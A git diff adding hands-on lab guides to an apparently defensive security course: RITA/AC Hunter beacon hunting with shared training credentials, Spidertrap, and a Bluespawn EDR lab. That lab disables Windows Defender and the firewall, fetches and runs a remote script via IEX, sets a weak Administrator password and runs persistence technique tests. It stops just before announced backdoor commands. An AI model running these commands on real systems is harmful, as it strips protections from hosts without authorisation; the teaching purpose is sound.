+![](attachments/rita_dnscat.png)
+
+This does not beacon back to a specific IP address, but rather it beacons through a DNS server. It is very crafty and will highlight how we can review the RAR compressed Bro logs used to generate the RITA data.
+
+We are going to jump right to the DNS tab. It gives us the clearest look at this backdoor.
+
+![](attachments/rita_dns.png)
+
+![](attachments/rita_dnsview.png)
+
+A couple of things should jump out at an investigator straight away. First, there were over 40K requests for **cat.nanobotninjas.com.** This is an absurd number for a specific domain. Sure, there are lots of requests for com and org and net and uk, but that is to be expected.
+
+Now, let's play with AC Hunter!
+
+Please go to 
+
+<pre>https://training.aihhosted.com/</pre>
+
+You might be prompted by a warning stating that your connection isn't private. This is **Okay**. 
+
+Simply click **Advanced** and then click **Continue to trainin.aihhosted.com**
+
+![](attachments/advanced.png)
+
+The creds are:
+
+email = **training@blackhillsinfosec.com**
+
+PW = **gotbeacons?**
+
+![](attachments/rita_achunterlogin.png)
+
+When logged in, you will be prompted to select a dataset. 
+
+Select **vsagent** and hit confirm.
+
+![](attachments/rita_datasetselection.png)
+
+>[!NOTE]
+>
+>If this is not what you see, select the house icon in the bottom left of your screen, followed by the gear in the upper right.
+
+![](attachments/rita_wrongplace.png)
+
+This will open the overall scoring screen, as seen below. This screen allows you to see the systems that have the top scores across all areas from beacons to cyber deception.
+
+Please select **10.55.100.111**, then click on Beacon Score on the right.
+
+![](attachments/rita_selectingbeacon.png)
+
+This will open the beacon score for this system.
+
+![](attachments/rita_beaconscore.png)
+
+Notice the **histogram** on the bottom and the scoring criteria in the middle. 
+
+Notice how on the bottom you can see multiple aspects of this systems connections.  For example, you can see if there are any connections that had a threat intel hit, or if there are any connections that have beacons to a fully qualified domain.
+
+Now, using **AC Hunter**, answer the following questions:
+
+1. In the winlab-agent dataset, what is the connection interval for 10.10.98.30?
+
+2. In the gcat dataset, what is the historic fqdn for the beacon on 10.55.100.111?
+
+3. For the dnscat2-ja3-strobe-agent dataset, what domain has the highest lookup count?
+4. Who is doing the lookups?
+
+
+***                                                                 
+
+<b><i>Continuing the course? </br>[Next Lab](/IntroClassFiles/Tools/IntroClass/ADHD/DNSChef.md)</i></b>
+
+<b><i>Want to go back? </br>[Previous Lab](/IntroClassFiles/Tools/IntroClass/ADHD/CuckooSandbox.md)</i></b>
+
+<b><i>Looking for a different lab? </br>[Lab Directory](/IntroClassFiles/navigation.md)</i></b>
+
+***Finished with the Labs?***
+
+Please be sure to destroy the lab environment!
+
+[Click here for instructions on how to destroy the Lab Environment](/IntroClassFiles/Tools/IntroClass/LabDestruction/labdestruction.md)
+
+---
+
+
+
+
+
diff --git a/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/attachments/AC_Hunter_Main_1.JPG b/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/attachments/AC_Hunter_Main_1.JPG
new file mode 100644
index 00000000..b11a98ca
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/attachments/AC_Hunter_Main_1.JPG differ
diff --git a/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/attachments/BeaconScore_3.JPG b/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/attachments/BeaconScore_3.JPG
new file mode 100644
index 00000000..10665b38
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/attachments/BeaconScore_3.JPG differ
diff --git a/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/attachments/Clipboard_2020-07-07-16-58-09.png b/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/attachments/Clipboard_2020-07-07-16-58-09.png
new file mode 100755
index 00000000..a2ba6850
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/attachments/Clipboard_2020-07-07-16-58-09.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/attachments/Clipboard_2020-07-07-16-59-17.png b/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/attachments/Clipboard_2020-07-07-16-59-17.png
new file mode 100755
index 00000000..34ac8f1a
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/attachments/Clipboard_2020-07-07-16-59-17.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/attachments/Clipboard_2020-07-07-17-00-10.png b/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/attachments/Clipboard_2020-07-07-17-00-10.png
new file mode 100755
index 00000000..b11434b3
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/attachments/Clipboard_2020-07-07-17-00-10.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/attachments/Clipboard_2020-07-07-17-01-18.png b/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/attachments/Clipboard_2020-07-07-17-01-18.png
new file mode 100755
index 00000000..ce957578
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/attachments/Clipboard_2020-07-07-17-01-18.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/attachments/Clipboard_2020-07-07-17-08-00.png b/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/attachments/Clipboard_2020-07-07-17-08-00.png
new file mode 100755
index 00000000..7969f0b9
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/attachments/Clipboard_2020-07-07-17-08-00.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/attachments/Clipboard_2020-07-07-17-08-41.png b/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/attachments/Clipboard_2020-07-07-17-08-41.png
new file mode 100755
index 00000000..f717834e
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/attachments/Clipboard_2020-07-07-17-08-41.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/attachments/Clipboard_2020-07-07-17-09-00.png b/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/attachments/Clipboard_2020-07-07-17-09-00.png
new file mode 100755
index 00000000..8c23527a
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/attachments/Clipboard_2020-07-07-17-09-00.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/attachments/Clipboard_2020-07-07-17-09-33.png b/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/attachments/Clipboard_2020-07-07-17-09-33.png
new file mode 100755
index 00000000..d3f9600f
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/attachments/Clipboard_2020-07-07-17-09-33.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/attachments/Clipboard_2020-07-07-17-09-56.png b/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/attachments/Clipboard_2020-07-07-17-09-56.png
new file mode 100755
index 00000000..9bd4f535
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/attachments/Clipboard_2020-07-07-17-09-56.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/attachments/DataSetSelection_2.JPG b/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/attachments/DataSetSelection_2.JPG
new file mode 100644
index 00000000..66a6b4f5
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/attachments/DataSetSelection_2.JPG differ
diff --git a/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/attachments/OpeningFileExplorer.png b/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/attachments/OpeningFileExplorer.png
new file mode 100644
index 00000000..7c3066b3
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/attachments/OpeningFileExplorer.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/attachments/advanced.png b/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/attachments/advanced.png
new file mode 100644
index 00000000..153dd3ce
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/attachments/advanced.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/attachments/rita_achunterhome.png b/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/attachments/rita_achunterhome.png
new file mode 100644
index 00000000..3601fc6f
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/attachments/rita_achunterhome.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/attachments/rita_achunterlogin.png b/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/attachments/rita_achunterlogin.png
new file mode 100644
index 00000000..d3e093fe
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/attachments/rita_achunterlogin.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/attachments/rita_beaconscore.png b/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/attachments/rita_beaconscore.png
new file mode 100644
index 00000000..c4368c99
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/attachments/rita_beaconscore.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/attachments/rita_beaconview.png b/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/attachments/rita_beaconview.png
new file mode 100644
index 00000000..43366b2a
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/attachments/rita_beaconview.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/attachments/rita_datasetselection.png b/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/attachments/rita_datasetselection.png
new file mode 100644
index 00000000..cf2eb5c8
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/attachments/rita_datasetselection.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/attachments/rita_dns.png b/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/attachments/rita_dns.png
new file mode 100644
index 00000000..4568497e
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/attachments/rita_dns.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/attachments/rita_dnscat.png b/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/attachments/rita_dnscat.png
new file mode 100644
index 00000000..c118ff88
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/attachments/rita_dnscat.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/attachments/rita_dnsview.png b/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/attachments/rita_dnsview.png
new file mode 100644
index 00000000..b970fbc1
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/attachments/rita_dnsview.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/attachments/rita_navhtmlreport.png b/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/attachments/rita_navhtmlreport.png
new file mode 100644
index 00000000..cbdfa5f4
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/attachments/rita_navhtmlreport.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/attachments/rita_navindex.png b/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/attachments/rita_navindex.png
new file mode 100644
index 00000000..50e84e60
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/attachments/rita_navindex.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/attachments/rita_navintrolabs.png b/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/attachments/rita_navintrolabs.png
new file mode 100644
index 00000000..9fa4f345
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/attachments/rita_navintrolabs.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/attachments/rita_rita.png b/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/attachments/rita_rita.png
new file mode 100644
index 00000000..18e8fa2f
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/attachments/rita_rita.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/attachments/rita_selectingbeacon.png b/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/attachments/rita_selectingbeacon.png
new file mode 100644
index 00000000..5495f74b
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/attachments/rita_selectingbeacon.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/attachments/rita_vsagent.png b/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/attachments/rita_vsagent.png
new file mode 100644
index 00000000..14f6195b
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/attachments/rita_vsagent.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/attachments/rita_wrongplace.png b/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/attachments/rita_wrongplace.png
new file mode 100644
index 00000000..f299dde3
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/attachments/rita_wrongplace.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/ADHD/Spidertrap/OpeningKaliInstance.png b/IntroClassFiles/Tools/IntroClass/ADHD/Spidertrap/OpeningKaliInstance.png
new file mode 100644
index 00000000..128fe9d7
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/ADHD/Spidertrap/OpeningKaliInstance.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/ADHD/Spidertrap/Spidertrap.md b/IntroClassFiles/Tools/IntroClass/ADHD/Spidertrap/Spidertrap.md
new file mode 100644
index 00000000..917cbfa6
--- /dev/null
+++ b/IntroClassFiles/Tools/IntroClass/ADHD/Spidertrap/Spidertrap.md
@@ -0,0 +1,136 @@
+![image](https://github.com/user-attachments/assets/068fae26-6e8f-402f-ad69-63a4e6a1f59e)
+
+# Spidertrap
+
+# Ubuntu VM
+
+Website
+-------
+
+<https://github.com/adhdproject/spidertrap>
+
+Description
+-----------
+
+Trap web crawlers and spiders in an infinite set of dynamically
+generated webpages.
+
+Install Location
+----------------
+
+`~/ADCD/spidertrap`
+
+Usage
+-----
+
+```bash
+python3 spidertrap.py --help
+```
+```
+Usage: spidertrap.py [FILE]
+
+FILE is file containing a list of webpage names to serve, one per line.
+If no file is provided, random links will be generated.
+```
+
+## Example 1: Basic Usage
+
+- Let's get started by getting into the proper directory:
+
+```bash
+cd ~/ADCD/spidertrap
+```
+
+<img width="470" height="46" alt="Screenshot From 2026-03-07 11-35-46" src="https://github.com/user-attachments/assets/5eb14d5e-b9fa-49f0-96ef-8f69caaeba78" />
+
+- Now, lets start Spidertrap by running the following command:
+
+```bash
+python3 spidertrap.py
+```
+
+<img width="645" height="68" alt="Screenshot From 2026-03-07 11-36-38" src="https://github.com/user-attachments/assets/2a5d40ff-a8be-42b9-8bb1-75d1013a8b00" />
+
+
+- Then visit the following site in a web browser:
+
+```
+http://localhost:8000
+``` 
+
+- You should see a page containing randomly generated links. If you click on a link it will take you to a page with more randomly generated links.
+
+<img width="587" height="291" alt="2026-03-07_11-38" src="https://github.com/user-attachments/assets/f255a713-0cb0-483a-abe0-60e6de7311a8" />
+
+<img width="599" height="363" alt="2" src="https://github.com/user-attachments/assets/ef0d15bb-070d-48b0-96b4-cbcb03b1be8b" />
+
+
+## Example 2: Providing a List of Links
+
+- For this example, we are going to start Spidertrap again, but this time, we are going to give it a file to generate its links.
+
+- Let's start Spidertrap again but with the following options:
+
+```bash
+python3 spidertrap.py directory-list-2.3-big.txt
+```
+
+>[!TIP]
+>
+>You may need to press `ctrl + c` to kill your existing Spidertrap session.
+
+
+<img width="908" height="76" alt="2026-03-07_11-40" src="https://github.com/user-attachments/assets/6c1ee1ea-cd52-4db5-9421-7bd7fdf18abc" />
+
+
+- Then visit the following site in a web browser:
+
+```bash
+http://localhost:8000
+```
+ 
+- You should see a page containing links taken from the file. If you click on a link it will take you to a page with more links from the file.
+
+<img width="607" height="281" alt="1" src="https://github.com/user-attachments/assets/f3c4370a-6158-41ab-95e0-ce868ce407c9" />
+
+<img width="617" height="250" alt="2" src="https://github.com/user-attachments/assets/ba81eb09-dfd3-408e-8fd0-47fc7c1ccb1b" />
+
+## Example 3: Trapping a Wget Spider
+
+- For this example, follow the instructions in [Example 1: Basic Usage](#example-1-basic-usage) or [Example 2: Providing a List of Links](#example-2-providing-a-list-of-links) to start Spidertrap. 
+
+- Once Spidertrap starts, open a new terminal
+
+<img width="311" height="52" alt="GetUbuntuTerminalFromUbuntuVM" src="https://github.com/user-attachments/assets/65df2abb-03ca-4f8f-b0db-172de6aaf990" />
+
+- We are going to use `wget` to mirror the website. 
+
+>[!IMPORTANT]
+>
+>`wget` will run until either it or Spidertrap is killed.
+>To stop the command output, type `ctrl + c`
+
+- Let's run the following command:
+
+```bash
+sudo wget -m http://127.0.0.1:8000
+```
+
+
+<img width="863" height="985" alt="2026-03-07_11-47" src="https://github.com/user-attachments/assets/08551cbe-44fb-4e41-96f5-ca2435dcab41" />
+
+
+- When finished, type `ctrl + c` to kill wget
+
+***                                                                 
+<b><i>Continuing the course? </br>[Next Lab](/IntroClassFiles/Tools/IntroClass/ADHD/Cowrie/Cowrie.md)</i></b>
+
+<b><i>Looking for a different lab? </br>[Lab Directory](/IntroClassFiles/navigation.md)</i></b>
+
+***Finished with the Labs?***
+
+Please be sure to destroy the lab environment!
+
+[Click here for instructions on how to destroy the Lab Environment](/IntroClassFiles/Tools/IntroClass/LabDestruction/labdestruction.md)
+
+---
diff --git a/IntroClassFiles/Tools/IntroClass/ADHD/Spidertrap/TaskbarKaliIcon.png b/IntroClassFiles/Tools/IntroClass/ADHD/Spidertrap/TaskbarKaliIcon.png
new file mode 100644
index 00000000..c8d6bd97
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/ADHD/Spidertrap/TaskbarKaliIcon.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/ADHD/Spidertrap/cdoptspidertrap.png b/IntroClassFiles/Tools/IntroClass/ADHD/Spidertrap/cdoptspidertrap.png
new file mode 100644
index 00000000..39256f54
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/ADHD/Spidertrap/cdoptspidertrap.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/ADHD/Spidertrap/ifconfig.png b/IntroClassFiles/Tools/IntroClass/ADHD/Spidertrap/ifconfig.png
new file mode 100644
index 00000000..7f9c3fcd
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/ADHD/Spidertrap/ifconfig.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/Spidertrap_files/image001.png b/IntroClassFiles/Tools/IntroClass/ADHD/Spidertrap/image001.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/Spidertrap_files/image001.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/Spidertrap/image001.png
diff --git a/IntroClassFiles/Tools/IntroClass/Spidertrap_files/image002.png b/IntroClassFiles/Tools/IntroClass/ADHD/Spidertrap/image002.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/Spidertrap_files/image002.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/Spidertrap/image002.png
diff --git a/IntroClassFiles/Tools/IntroClass/Spidertrap_files/image003.png b/IntroClassFiles/Tools/IntroClass/ADHD/Spidertrap/image003.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/Spidertrap_files/image003.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/Spidertrap/image003.png
diff --git a/IntroClassFiles/Tools/IntroClass/Spidertrap_files/image004.png b/IntroClassFiles/Tools/IntroClass/ADHD/Spidertrap/image004.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/Spidertrap_files/image004.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/Spidertrap/image004.png
diff --git a/IntroClassFiles/Tools/IntroClass/ADHD/Spidertrap/links.png b/IntroClassFiles/Tools/IntroClass/ADHD/Spidertrap/links.png
new file mode 100644
index 00000000..6371250b
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/ADHD/Spidertrap/links.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/ADHD/Spidertrap/links2.png b/IntroClassFiles/Tools/IntroClass/ADHD/Spidertrap/links2.png
new file mode 100644
index 00000000..6123fbb2
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/ADHD/Spidertrap/links2.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/ADHD/Spidertrap/morelinks.png b/IntroClassFiles/Tools/IntroClass/ADHD/Spidertrap/morelinks.png
new file mode 100644
index 00000000..1b904361
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/ADHD/Spidertrap/morelinks.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/ADHD/Spidertrap/morelinks2.png b/IntroClassFiles/Tools/IntroClass/ADHD/Spidertrap/morelinks2.png
new file mode 100644
index 00000000..bc7250b8
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/ADHD/Spidertrap/morelinks2.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/ADHD/Spidertrap/startspidertrap.png b/IntroClassFiles/Tools/IntroClass/ADHD/Spidertrap/startspidertrap.png
new file mode 100644
index 00000000..fd68c53b
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/ADHD/Spidertrap/startspidertrap.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/ADHD/Spidertrap/startwithoptions.png b/IntroClassFiles/Tools/IntroClass/ADHD/Spidertrap/startwithoptions.png
new file mode 100644
index 00000000..c73d4603
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/ADHD/Spidertrap/startwithoptions.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/ADHD/Spidertrap/wgetcommand.png b/IntroClassFiles/Tools/IntroClass/ADHD/Spidertrap/wgetcommand.png
new file mode 100644
index 00000000..cfe9d5f8
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/ADHD/Spidertrap/wgetcommand.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/ADHD/bluespawn/Bluespawn.md b/IntroClassFiles/Tools/IntroClass/ADHD/bluespawn/Bluespawn.md
new file mode 100755
index 00000000..c910879d
--- /dev/null
+++ b/IntroClassFiles/Tools/IntroClass/ADHD/bluespawn/Bluespawn.md
@@ -0,0 +1,432 @@
+![image](https://github.com/user-attachments/assets/068fae26-6e8f-402f-ad69-63a4e6a1f59e)
+
+# Atomic Red Team And Bluespawn
+
+In this lab we will be using Bluespawn as a stand-in for an EDR system.  Normally full EDRs like Cylance and Crowdstrike are very expensive and tend not to show up in classes like this.  However, the folks at University of Virginia have done an outstanding job with BlueSpawn. 
+
+BlueSpawn will monitor the system for "weird" behavior and note it when it occurs. For the money, it is great.
+
+In this lab, we will be starting BlueSpawn and then running Atomic Red Team to trigger a lot of alerts.
+
+First, we need to disable Defender. 
+Start by opening up <b>Windows Powershell</b>.
+
+<img width="74" height="91" alt="image" src="https://github.com/user-attachments/assets/685d264c-661c-4dbf-aa79-54f925cefdb1" />
+
+
+Next, run the following command:
+
+```ps
+Set-MpPreference -DisableRealtimeMonitoring $true
+```
+
+```ps
+Set-MpPreference -DisableBehaviorMonitoring $true
+```
+
+<img width="824" height="155" alt="2026-03-26_09-47" src="https://github.com/user-attachments/assets/d83571b4-0a39-4e4b-a9ef-cf6763954e2c" />
+
+
+This will disable Defender for this session.
+
+>[!NOTE]
+>
+>If you get angry red errors, that is Ok, it means Defender is not running.
+
+
+Now, let's open a **command prompt**:
+
+<img width="74" height="91" alt="Screenshot From 2026-02-07 17-59-56" src="https://github.com/user-attachments/assets/f62f8205-8828-4a2b-97f0-e7137ec466e5" />
+
+ 
+Next, let’s change directories to tools and start Bluespawn:
+
+```bash
+cd \IntroLabs
+```
+
+```bash
+BLUESPAWN-client-x64.exe --monitor --aggressiveness cursory
+```
+
+You should see something like this:
+
+<img width="862" height="638" alt="2026-03-26_09-50" src="https://github.com/user-attachments/assets/a3419596-b4ca-4ea1-8d2a-832046873f76" />
+
+
+If you made it this far, perfect! That means Bluespawn is up and running.
+
+Now, let’s use Atomic Red Team to test the monitoring with BlueSpawn:
+
+First, we need to open a PowerShell terminal. 
+
+You can do this by selecting the icon in the taskbar/desktop:
+
+<img width="74" height="91" alt="image" src="https://github.com/user-attachments/assets/685d264c-661c-4dbf-aa79-54f925cefdb1" />
+
+Now we need to install and update Atomic Red Team. Run the following:
+
+```bash
+cd \
+```
+
+```ps
+IEX (IWR 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1' -UseBasicParsing);
+Install-AtomicRedTeam -getAtomics -Force
+```
+
+>[!NOTE]
+>
+> This can take a bit. After about 120 seconds, try hitting enter to get your prompt back.
+
+Once you see the following, you are set to move forward:
+
+<img width="1100" height="292" alt="2026-03-26_09-54" src="https://github.com/user-attachments/assets/41cb6202-0911-480c-bb68-0953bf66a213" />
+
+
+Next, in the PowerShell Window we need to navigate to the Atomic Red Team directory and import the powershell modules:
+
+```ps
+cd C:\AtomicRedTeam\invoke-atomicredteam\
+```
+
+Then, install the proper `yaml` modules by running the following:
+
+```ps
+Install-Module -Name powershell-yaml
+```
+
+>[!NOTE]
+>
+>When prompted, press Y to install the modules.
+
+```ps
+Import-Module .\Invoke-AtomicRedTeam.psm1
+```
+
+
+Once we do this, we need to invoke all the Atomic Tests.
+
+>[!IMPORTANT]  
+>
+>Don't do this in production...  Ever.
+>  
+>Always run tools like Atomic Red Team on test systems.
+>
+>We recommend that you run in on a system with your EDR/Endpoint protection in non-blocking/alerting mode. This is so you can see what the protection would have done, but it will allow the tests to finish so we are just going to run individual tests for now.
+
+Run the following individually:
+
+```ps
+Invoke-AtomicTest T1547.004
+```
+
+More information here:
+
+https://attack.mitre.org/techniques/T1547/004/
+
+```ps
+Invoke-AtomicTest T1543.003
+```
+
+More information here:
+
+https://attack.mitre.org/techniques/T1543/003/
+
+```ps
+Invoke-AtomicTest T1547.001
+```
+
+More information here:
+
+https://attack.mitre.org/techniques/T1547/001/
+
+```ps
+Invoke-AtomicTest T1546.008
+```
+
+More information here:
+
+https://attack.mitre.org/techniques/T1546/008/
+
+
+>[!TIP]
+>
+>If you get any “file exists” questions or errors, just select `Yes`.
+
+It should look like this:
+
+<img width="633" height="264" alt="2026-03-26_10-00" src="https://github.com/user-attachments/assets/3cc66d66-4156-45be-b149-e81145a1a920" />
+
+
+>[!NOTE]
+>
+>There might be some errors when this runs. This is 
+normal.
+
+>[!IMPORTANT]
+>
+>We had to cross reference the old numbering with the new.
+>
+>You can find that mapping here:
+>
+>https://attack.mitre.org/docs/subtechniques/subtechniques-crosswalk.json
+>
+>![](attachments/crossreference.png)
+
+
+You should be getting a lot of alerts with Bluespawn! Switch tabs in your Terminal to see them:
+
+<img width="1096" height="631" alt="2026-03-26_10-09" src="https://github.com/user-attachments/assets/135ce716-47fb-4840-b6a2-1c00c999bc87" />
+
+
+Now, let’s go back to the PowerShell window and clean up:
+
+```ps
+Invoke-AtomicTest All -Cleanup
+```
+
+It should look like this:
+
+<img width="1093" height="444" alt="2026-03-26_10-06" src="https://github.com/user-attachments/assets/2dd53a33-3c40-4cf8-9d86-bb18c3bb7ec5" />
+
+
+# If you have more time
+
+Let’s begin by disabling **Defender**. Simply run the following from an **Administrator PowerShell** prompt:
+
+<img width="74" height="91" alt="image" src="https://github.com/user-attachments/assets/685d264c-661c-4dbf-aa79-54f925cefdb1" />
+
+
+Next, run the following command in the **Powershell** terminal:
+
+```ps
+Set-MpPreference -DisableRealtimeMonitoring $true
+```
+
+<img width="820" height="139" alt="2026-03-26_10-20" src="https://github.com/user-attachments/assets/446b50ed-75b5-4e04-a505-559833112aa1" />
+
+
+This will disable **Defender** for this session.
+
+If you get angry red errors, that is **Ok**, it means **Defender** is not running.
+
+Open **Command Prompt**
+
+<img width="74" height="91" alt="Screenshot From 2026-02-07 17-59-56" src="https://github.com/user-attachments/assets/761a7584-f744-4f6a-926b-339891c1d5b4" />
+
+Next, lets ensure the firewall is disabled. In a Windows Command Prompt.
+
+```cmd
+netsh advfirewall set allprofiles state off
+```
+
+
+Next, set a password for the Administrator account that you can remember
+
+```bash
+net user Administrator password1234
+```
+
+Please note, that is a very bad password.  Come up with something better. But, please remember it.
+
+Let's continue by opening an **Ubuntu** terminal
+
+<img width="90" height="104" alt="Screenshot From 2026-02-23 10-28-37" src="https://github.com/user-attachments/assets/dc26dda4-12b8-4f03-8a07-f170e5064f8d" />
+
+
+
+Become root:
+
+```bash
+sudo su -
+```
+
+
+Before we run the next commands, we need to get the **IP** of our **Linux System**. Lets do so by running the following:
+
+```bash
+ifconfig
+```
+
+<img width="716" height="175" alt="Get_IPLinux" src="https://github.com/user-attachments/assets/55ffa0a2-0502-4331-ad4e-720b1c1f4205" />
+
+**REMEMBER: YOUR IP WILL BE DIFFERENT**
+
+Run the following commands to start a simple backdoor and backdoor listener: 
+
+```bash
+cd /tmp/
+```
+
+
+
+Run the following commands to start a simple backdoor and backdoor listener: 
+
